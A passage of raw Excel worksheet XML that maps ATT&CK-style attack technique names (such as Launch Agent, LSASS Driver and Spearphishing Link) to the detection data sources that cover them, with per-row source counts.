        <v>2</v>
      </c>
      <c r="E148">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H148" t="str">
        <f>LOOKUP(A148,'REF-DataSources'!A:B)</f>
        <v>Hidden Users</v>
      </c>
    </row>
    <row r="149" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A149" s="11" t="s">
        <v>208</v>
      </c>
      <c r="B149" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Authentication logs,File monitoring,Environment variable</v>
      </c>
      <c r="C149" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D149">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E149">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H149" t="str">
        <f>LOOKUP(A149,'REF-DataSources'!A:B)</f>
        <v>HISTCONTROL</v>
      </c>
    </row>
    <row r="150" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A150" s="11" t="s">
        <v>209</v>
      </c>
      <c r="B150" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C150" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D150">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E150">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H150" t="str">
        <f>LOOKUP(A150,'REF-DataSources'!A:B)</f>
        <v>LC_MAIN Hijacking</v>
      </c>
    </row>
    <row r="151" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A151" s="11" t="s">
        <v>210</v>
      </c>
      <c r="B151" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C151" s="8" t="s">
        <v>1127</v>
      </c>
      <c r="D151">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E151">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H151" t="str">
        <f>LOOKUP(A151,'REF-DataSources'!A:B)</f>
        <v>Plist Modification</v>
      </c>
    </row>
    <row r="152" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A152" s="11" t="s">
        <v>211</v>
      </c>
      <c r="B152" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C152" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D152">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E152">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H152" t="str">
        <f>LOOKUP(A152,'REF-DataSources'!A:B)</f>
        <v>Space after Filename</v>
      </c>
    </row>
    <row r="153" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A153" s="11" t="s">
        <v>212</v>
      </c>
      <c r="B153" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C153" s="8" t="s">
        <v>1127</v>
      </c>
      <c r="D153">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E153">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H153" t="str">
        <f>LOOKUP(A153,'REF-DataSources'!A:B)</f>
        <v>Launchctl</v>
      </c>
    </row>
    <row r="154" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A154" s="11" t="s">
        <v>213</v>
      </c>
      <c r="B154" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Process command-line parameters</v>
      </c>
      <c r="C154" s="8" t="s">
        <v>1168</v>
      </c>
      <c r="D154">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E154">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H154" t="str">
        <f>LOOKUP(A154,'REF-DataSources'!A:B)</f>
        <v>Source</v>
      </c>
    </row>
    <row r="155" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A155" s="11" t="s">
        <v>214</v>
      </c>
      <c r="B155" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C155" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D155">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E155">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H155" t="str">
        <f>LOOKUP(A155,'REF-DataSources'!A:B)</f>
        <v>Trap</v>
      </c>
    </row>
    <row r="156" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A156" s="11" t="s">
        <v>215</v>
      </c>
      <c r="B156" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:C)</f>
        <v>API monitoring,System calls,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C156" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D156">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E156">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H156" t="str">
        <f>LOOKUP(A156,'REF-DataSources'!A:B)</f>
        <v>AppleScript</v>
      </c>
    </row>
    <row r="157" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A157" s="11" t="s">
        <v>216</v>
      </c>
      <c r="B157" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Process use of network</v>
      </c>
      <c r="C157" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D157">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E157">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H157" t="str">
        <f>LOOKUP(A157,'REF-DataSources'!A:B)</f>
        <v>.bash_profile and .bashrc</v>
      </c>
    </row>
    <row r="158" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A158" s="11" t="s">
        <v>217</v>
      </c>
      <c r="B158" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C158" s="8">
        <v>100</v>
      </c>
      <c r="D158">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E158">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H158" t="str">
        <f>LOOKUP(A158,'REF-DataSources'!A:B)</f>
        <v>Dylib Hijacking</v>
      </c>
    </row>
    <row r="159" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A159" s="11" t="s">
        <v>218</v>
      </c>
      <c r="B159" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C159" s="8" t="s">
        <v>1127</v>
      </c>
      <c r="D159">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E159">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H159" t="str">
        <f>LOOKUP(A159,'REF-DataSources'!A:B)</f>
        <v>Hidden Files and Directories</v>
      </c>
    </row>
    <row r="160" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A160" s="11" t="s">
        <v>219</v>
      </c>
      <c r="B160" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C160" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D160">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E160">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H160" t="str">
        <f>LOOKUP(A160,'REF-DataSources'!A:B)</f>
        <v>Launch Agent</v>
      </c>
    </row>
    <row r="161" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A161" s="11" t="s">
        <v>220</v>
      </c>
      <c r="B161" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C161" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D161">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E161">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H161" t="str">
        <f>LOOKUP(A161,'REF-DataSources'!A:B)</f>
        <v>Launch Daemon</v>
      </c>
    </row>
    <row r="162" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A162" s="11" t="s">
        <v>221</v>
      </c>
      <c r="B162" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:C)</f>
        <v>Binary file metadata,Process monitoring,Process command-line parameters,File monitoring</v>
      </c>
      <c r="C162" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D162">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E162">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H162" t="str">
        <f>LOOKUP(A162,'REF-DataSources'!A:B)</f>
        <v>LC_LOAD_DYLIB Addition</v>
      </c>
    </row>
    <row r="163" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A163" s="11" t="s">
        <v>222</v>
      </c>
      <c r="B163" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C163" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D163">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E163">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H163" t="str">
        <f>LOOKUP(A163,'REF-DataSources'!A:B)</f>
        <v>Login Item</v>
      </c>
    </row>
    <row r="164" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A164" s="11" t="s">
        <v>223</v>
      </c>
      <c r="B164" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C164" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D164">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E164">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H164" t="str">
        <f>LOOKUP(A164,'REF-DataSources'!A:B)</f>
        <v>Rc.common</v>
      </c>
    </row>
    <row r="165" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A165" s="11" t="s">
        <v>224</v>
      </c>
      <c r="B165" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C165" s="8">
        <v>0</v>
      </c>
      <c r="D165">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E165">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H165" t="str">
        <f>LOOKUP(A165,'REF-DataSources'!A:B)</f>
        <v>Re-opened Applications</v>
      </c>
    </row>
    <row r="166" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A166" s="11" t="s">
        <v>225</v>
      </c>
      <c r="B166" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C166" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D166">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E166">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H166" t="str">
        <f>LOOKUP(A166,'REF-DataSources'!A:B)</f>
        <v>Startup Items</v>
      </c>
    </row>
    <row r="167" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A167" s="11" t="s">
        <v>226</v>
      </c>
      <c r="B167" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C167" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D167">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E167">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H167" t="str">
        <f>LOOKUP(A167,'REF-DataSources'!A:B)</f>
        <v>Setuid and Setgid</v>
      </c>
    </row>
    <row r="168" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A168" s="11" t="s">
        <v>227</v>
      </c>
      <c r="B168" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C168" s="8">
        <v>100</v>
      </c>
      <c r="D168">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E168">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H168" t="str">
        <f>LOOKUP(A168,'REF-DataSources'!A:B)</f>
        <v>Securityd Memory</v>
      </c>
    </row>
    <row r="169" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A169" s="11" t="s">
        <v>228</v>
      </c>
      <c r="B169" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C169" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D169">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E169">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H169" t="str">
        <f>LOOKUP(A169,'REF-DataSources'!A:B)</f>
        <v>Local Job Scheduling</v>
      </c>
    </row>
    <row r="170" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A170" s="11" t="s">
        <v>229</v>
      </c>
      <c r="B170" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:C)</f>
        <v>File monitoring</v>
      </c>
      <c r="C170" s="8">
        <v>100</v>
      </c>
      <c r="D170">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E170">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H170" t="str">
        <f>LOOKUP(A170,'REF-DataSources'!A:B)</f>
        <v>Sudo</v>
      </c>
    </row>
    <row r="171" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A171" s="11" t="s">
        <v>230</v>
      </c>
      <c r="B171" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C171" s="8" t="s">
        <v>1109</v>
      </c>
      <c r="D171">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E171">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H171" t="str">
        <f>LOOKUP(A171,'REF-DataSources'!A:B)</f>
        <v>Mshta</v>
      </c>
    </row>
    <row r="172" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A172" s="11" t="s">
        <v>231</v>
      </c>
      <c r="B172" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Windows Registry,Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C172" s="8" t="s">
        <v>1172</v>
      </c>
      <c r="D172">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E172">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H172" t="str">
        <f>LOOKUP(A172,'REF-DataSources'!A:B)</f>
        <v>LLMNR/NBT-NS Poisoning and Relay</v>
      </c>
    </row>
    <row r="173" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A173" s="11" t="s">
        <v>232</v>
      </c>
      <c r="B173" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Packet capture</v>
      </c>
      <c r="C173" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D173">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E173">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H173" t="str">
        <f>LOOKUP(A173,'REF-DataSources'!A:B)</f>
        <v>Domain Fronting</v>
      </c>
    </row>
    <row r="174" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A174" s="11" t="s">
        <v>233</v>
      </c>
      <c r="B174" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C174" s="8" t="s">
        <v>1114</v>
      </c>
      <c r="D174">
        <f t="shared" si="5"/>
        <v>5</v>
      </c>
      <c r="E174">
        <f t="shared" si="6"/>
        <v>5</v>
      </c>
      <c r="H174" t="str">
        <f>LOOKUP(A174,'REF-DataSources'!A:B)</f>
        <v>Dynamic Data Exchange</v>
      </c>
    </row>
    <row r="175" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A175" s="11" t="s">
        <v>234</v>
      </c>
      <c r="B175" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:C)</f>
        <v>DLL monitoring,Process monitoring,Windows Registry</v>
      </c>
      <c r="C175" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D175">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E175">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H175" t="str">
        <f>LOOKUP(A175,'REF-DataSources'!A:B)</f>
        <v>Password Filter DLL</v>
      </c>
    </row>
    <row r="176" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A176" s="11" t="s">
        <v>235</v>
      </c>
      <c r="B176" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Authentication logs,DLL monitoring,Packet capture,Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C176" s="8" t="s">
        <v>1174</v>
      </c>
      <c r="D176">
        <f t="shared" si="5"/>
        <v>8</v>
      </c>
      <c r="E176">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="H176" t="str">
        <f>LOOKUP(A176,'REF-DataSources'!A:B)</f>
        <v>Component Object Model and Distributed COM</v>
      </c>
    </row>
    <row r="177" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A177" s="11" t="s">
        <v>236</v>
      </c>
      <c r="B177" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Packet capture,System calls,Process use of network,Process monitoring,Browser extensions</v>
      </c>
      <c r="C177" s="8" t="s">
        <v>1175</v>
      </c>
      <c r="D177">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E177">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="H177" t="str">
        <f>LOOKUP(A177,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
    </row>
    <row r="178" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A178" s="11" t="s">
        <v>237</v>
      </c>
      <c r="B178" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>API monitoring,DLL monitoring,File monitoring,Kernel drivers,Loaded DLLs,Process monitoring</v>
      </c>
      <c r="C178" s="8" t="s">
        <v>1176</v>
      </c>
      <c r="D178">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E178">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="H178" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:B)</f>
        <v>LSASS Driver</v>
      </c>
    </row>
    <row r="179" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A179" s="11" t="s">
        <v>238</v>
      </c>
      <c r="B179" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Windows event logs</v>
      </c>
      <c r="C179" s="8" t="s">
        <v>1168</v>
      </c>
      <c r="D179">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E179">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H179" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:B)</f>
        <v>SID-History Injection</v>
      </c>
    </row>
    <row r="180" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A180" s="11" t="s">
        <v>239</v>
      </c>
      <c r="B180" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Binary file metadata,DLL monitoring,Loaded DLLs,Process monitoring,Windows event logs</v>
      </c>
      <c r="C180" s="8" t="s">
        <v>1177</v>
      </c>
      <c r="D180">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E180">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="H180" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:B)</f>
        <v>Hooking</v>
      </c>
    </row>
    <row r="181" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A181" s="11" t="s">
        <v>240</v>
      </c>
      <c r="B181" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Windows Registry,File monitoring</v>
      </c>
      <c r="C181" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D181">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E181">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H181" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:B)</f>
        <v>Screensaver</v>
      </c>
    </row>
    <row r="182" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A182" s="11" t="s">
        <v>241</v>
      </c>
      <c r="B182" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C182" s="8" t="s">
        <v>1133</v>
      </c>
      <c r="D182">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E182">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H182" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:B)</f>
        <v>Extra Window Memory Injection</v>
      </c>
    </row>
    <row r="183" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A183" s="11" t="s">
        <v>242</v>
      </c>
      <c r="B183" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Loaded DLLs,Process monitoring,Windows Registry</v>
      </c>
      <c r="C183" s="8" t="s">
        <v>1116</v>
      </c>
      <c r="D183">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E183">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H183" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:B)</f>
        <v>AppCert DLLs</v>
      </c>
    </row>
    <row r="184" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A184" s="11" t="s">
        <v>243</v>
      </c>
      <c r="B184" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Windows Registry,Windows event logs</v>
      </c>
      <c r="C184" s="8" t="s">
        <v>1108</v>
      </c>
      <c r="D184">
        <f t="shared" si="5"/>
        <v>3</v>
      </c>
      <c r="E184">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="H184" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:B)</f>
        <v>Image File Execution Options Injection</v>
      </c>
    </row>
    <row r="185" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A185" s="11" t="s">
        <v>244</v>
      </c>
      <c r="B185" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Authentication logs</v>
      </c>
      <c r="C185" s="8">
        <v>100</v>
      </c>
      <c r="D185">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="E185">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="H185" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:B)</f>
        <v>SSH Hijacking</v>
      </c>
    </row>
    <row r="186" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A186" s="11" t="s">
        <v>245</v>
      </c>
      <c r="B186" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C186" s="8" t="s">
        <v>1178</v>
      </c>
      <c r="D186">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E186">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H186" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
    </row>
    <row r="187" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A187" s="11" t="s">
        <v>246</v>
      </c>
      <c r="B187" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring</v>
      </c>
      <c r="C187" s="8" t="s">
        <v>1173</v>
      </c>
      <c r="D187">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E187">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H187" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:B)</f>
        <v>Process Doppelgänging</v>
      </c>
    </row>
    <row r="188" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A188" s="11" t="s">
        <v>247</v>
      </c>
      <c r="B188" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C188" s="8" t="s">
        <v>1179</v>
      </c>
      <c r="D188">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E188">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H188" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
    </row>
    <row r="189" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A189" s="11" t="s">
        <v>248</v>
      </c>
      <c r="B189" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Netflow/Enclave netflow</v>
      </c>
      <c r="C189" s="8" t="s">
        <v>1173</v>
      </c>
      <c r="D189">
        <f t="shared" si="5"/>
        <v>2</v>
      </c>
      <c r="E189">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="H189" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:B)</f>
        <v>Multi-hop Proxy</v>
      </c>
    </row>
    <row r="190" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A190" s="11" t="s">
        <v>249</v>
      </c>
      <c r="B190" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C190" s="8" t="s">
        <v>1180</v>
      </c>
      <c r="D190">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E190">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="H190" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:B)</f>
        <v>Drive-by Compromise</v>
      </c>
    </row>
    <row r="191" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A191" s="11" t="s">
        <v>250</v>
      </c>
      <c r="B191" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C191" s="8" t="s">
        <v>1105</v>
      </c>
      <c r="D191">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E191">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H191" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
    </row>
    <row r="192" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A192" s="11" t="s">
        <v>251</v>
      </c>
      <c r="B192" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,Windows event logs</v>
      </c>
      <c r="C192" s="8" t="s">
        <v>1181</v>
      </c>
      <c r="D192">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E192">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="H192" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:B)</f>
        <v>CMSTP</v>
      </c>
    </row>
    <row r="193" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A193" s="11" t="s">
        <v>252</v>
      </c>
      <c r="B193" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</v>
      </c>
      <c r="C193" s="8" t="s">
        <v>1182</v>
      </c>
      <c r="D193">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E193">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="H193" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:B)</f>
        <v>Spearphishing Link</v>
      </c>
    </row>
    <row r="194" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A194" s="11" t="s">
        <v>253</v>
      </c>
      <c r="B194" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</v>
      </c>
      <c r="C194" s="8" t="s">
        <v>1183</v>
      </c>
      <c r="D194">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E194">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="H194" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:B)</f>
        <v>Spearphishing Attachment</v>
      </c>
    </row>
    <row r="195" spans="1:8" x14ac:dyDescent="0.2">
      <c r="A195" s="11" t="s">
        <v>254</v>
      </c>
      <c r="B195" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Anti-virus,Web proxy</v>
